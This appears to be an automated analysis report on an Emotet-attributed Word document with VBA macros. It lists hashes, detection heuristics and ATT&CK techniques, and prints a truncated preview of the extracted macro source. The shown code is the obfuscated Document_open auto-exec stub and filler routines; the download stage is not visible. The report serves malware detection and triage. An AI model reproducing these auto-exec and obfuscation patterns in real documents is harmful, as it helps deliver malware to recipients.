Emotet Office (OLE) malware analysis — malicious · eb43ccdf1cb6a24a

MALICIOUS

Office (OLE)

211.7 KB Created: 2020-02-06 22:10:00 Authoring application: Microsoft Office Word First seen: 2020-07-24

MD5: 8b64c17d03f21a8633c66154cbe979f8 SHA-1: 4085f422049f209cf33dd0dae404881a76ec6a80 SHA-256: eb43ccdf1cb6a24a70614ad7df5b116a9f4f92864c60a344b6992a48cdcebc7a

262 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1140 Deobfuscate/Decode Files or Information

The sample contains VBA macros, specifically a Document_Open macro, which is a common technique for Emotet. The critical heuristic 'OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER' indicates the macro is designed to execute commands, likely to download and run a secondary payload. The ClamAV detection explicitly names Emotet, further supporting the family attribution.

Heuristics 7

ClamAV: Doc.Downloader.Emotet-7578627-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-7578627-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER

VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 12919 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	12919 bytes
SHA-256: `f4992f2a12d16edbd77ff218bdba59e660494c4377854ee978a384724889f5a5`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Mgnfyhwvxjg" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_open() If 121121 <> 715924 Then mnYaLPCBoJ = 121121 + 1989 mmUPSPeNPb = 715924 - 2013 Else MsgBox (CStr(mnYaLPCBoJ) & CStr(mmUPSPeNPb)) End If For aDQW = 9 To 59 DoEvents Next aDQW eGOgHeluFI = "omJDjGORbm" bmxvRTTBmQ = 749513 eGOgHeluFI = eGOgHeluFI & CStr(bmxvRTTBmQ) BAOtZRDjDs = eGOgHeluFI Qwtqdvuwif.Gdlqpuprb End Sub Attribute VB_Name = "Kvwjoasw" Attribute VB_Base = "0{542A604D-9F02-46CB-A6E3-62B4F74D277E}{17B47A69-ACF5-4D48-9616-47755CE0AEDD}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Mkbwhrfcxwfdy" Attribute VB_Base = "0{A10F8CFB-A9E1-457A-B308-4127606D3C0B}{B3F476D3-B897-423F-8E93-BA1782D54A3B}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Sub Lncssbaykpw() Debug.Print "nsg jjw uujsn bw" + q + "mnn iw dududud oow" End Sub Attribute VB_Name = "Zegkifid" Attribute VB_Base = "0{E8F7C5C9-15A9-4D53-B321-4660F8FFF625}{BF8FDED7-37E3-4DFC-A45D-5B09E17EC05B}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Sub Qgzzobvbu() Debug.Print "nsg jjw uujsn bw" + q + "mnn iw dududud oow" End Sub Attribute VB_Name = "Qgosaylmrhko" Attribute VB_Base = "0{B8DE1C7F-9466-4464-BEFA-F6B894BFE2E9}{032D739C-6E92-4D71-8A46-331A7DB75002}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Sub Squvtalp() Debug.Print "nsg jjw uujsn bw" + q + "mnn iw dududud oow" End Sub Attribute VB_Name = "Ltbmwoobvk" Attribute VB_Base = "0{044A4292-C78D-476E-8D42-181F7B3E06A6}{7A5E36E6-B343-46E7-8129-39E49644BAB5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Sub Rshhwrexgswxv() Debug.Print "nsg jjw uujsn bw" + q + "mnn iw dududud oow" End Sub Attribute VB_Name = "Gbhhbxcg" Attribute VB_Base = "0{85182648-70E4-41E9-A1C6-299C4B2649C7}{4443565A-FACA-474C-88B9-3232A2D00526}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Sub Zqctisssuycnl() Debug.Print "nsg jjw uujsn bw" + q + "mnn iw dududud oow" End Sub Attribute VB_Name = "Kmfswdqkoiao" Attribute VB_Base = "0{E7A4F5B4-533C-4DC7-8034-99C6864D0D21}{7136435F-B05C-4AF5-8D96-4BE04FA95A91}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Sub Aplakxbcdy() Debug.Print "nsg jjw uujsn bw" + q + "mnn iw dududud oow" End Sub Attribute VB_Name = "Fbmxspdn" Attribute VB_Base = "0{292A5C65-03B4-4910-90FE-B6CD068430E9}{358BCE5D-F4F8-44C9-B5D3-BA1038A7A76F}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Sub Woksifolie() Debug.Print "nsg jjw uujsn bw" + q + "mnn iw dududud oow" End Sub Attribute VB_Name = "Tjrmagtiih" Attribute VB_Base = "0{415A6833-4601-442C-850B-8B3F7CC ... (truncated)

SHA-256: f4992f2a12d16edbd77ff218bdba59e660494c4377854ee978a384724889f5a5

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "Mgnfyhwvxjg"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
   If 121121 <> 715924 Then
mnYaLPCBoJ = 121121 + 1989
mmUPSPeNPb = 715924 - 2013
Else
MsgBox (CStr(mnYaLPCBoJ) & CStr(mmUPSPeNPb))
End If
For aDQW = 9 To 59
DoEvents
Next aDQW
eGOgHeluFI = "omJDjGORbm"
bmxvRTTBmQ = 749513
eGOgHeluFI = eGOgHeluFI & CStr(bmxvRTTBmQ)
BAOtZRDjDs = eGOgHeluFI
 
Qwtqdvuwif.Gdlqpuprb
End Sub

Attribute VB_Name = "Kvwjoasw"
Attribute VB_Base = "0{542A604D-9F02-46CB-A6E3-62B4F74D277E}{17B47A69-ACF5-4D48-9616-47755CE0AEDD}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Mkbwhrfcxwfdy"
Attribute VB_Base = "0{A10F8CFB-A9E1-457A-B308-4127606D3C0B}{B3F476D3-B897-423F-8E93-BA1782D54A3B}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Lncssbaykpw()
Debug.Print "nsg jjw uujsn bw" + q + "mnn iw dududud oow"
End Sub

Attribute VB_Name = "Zegkifid"
Attribute VB_Base = "0{E8F7C5C9-15A9-4D53-B321-4660F8FFF625}{BF8FDED7-37E3-4DFC-A45D-5B09E17EC05B}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Qgzzobvbu()
Debug.Print "nsg jjw uujsn bw" + q + "mnn iw dududud oow"
End Sub

Attribute VB_Name = "Qgosaylmrhko"
Attribute VB_Base = "0{B8DE1C7F-9466-4464-BEFA-F6B894BFE2E9}{032D739C-6E92-4D71-8A46-331A7DB75002}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Squvtalp()
Debug.Print "nsg jjw uujsn bw" + q + "mnn iw dududud oow"
End Sub

Attribute VB_Name = "Ltbmwoobvk"
Attribute VB_Base = "0{044A4292-C78D-476E-8D42-181F7B3E06A6}{7A5E36E6-B343-46E7-8129-39E49644BAB5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Rshhwrexgswxv()
Debug.Print "nsg jjw uujsn bw" + q + "mnn iw dududud oow"
End Sub

Attribute VB_Name = "Gbhhbxcg"
Attribute VB_Base = "0{85182648-70E4-41E9-A1C6-299C4B2649C7}{4443565A-FACA-474C-88B9-3232A2D00526}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Zqctisssuycnl()
Debug.Print "nsg jjw uujsn bw" + q + "mnn iw dududud oow"
End Sub

Attribute VB_Name = "Kmfswdqkoiao"
Attribute VB_Base = "0{E7A4F5B4-533C-4DC7-8034-99C6864D0D21}{7136435F-B05C-4AF5-8D96-4BE04FA95A91}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Aplakxbcdy()
Debug.Print "nsg jjw uujsn bw" + q + "mnn iw dududud oow"
End Sub

Attribute VB_Name = "Fbmxspdn"
Attribute VB_Base = "0{292A5C65-03B4-4910-90FE-B6CD068430E9}{358BCE5D-F4F8-44C9-B5D3-BA1038A7A76F}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Woksifolie()
Debug.Print "nsg jjw uujsn bw" + q + "mnn iw dududud oow"
End Sub

Attribute VB_Name = "Tjrmagtiih"
Attribute VB_Base = "0{415A6833-4601-442C-850B-8B3F7CC
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.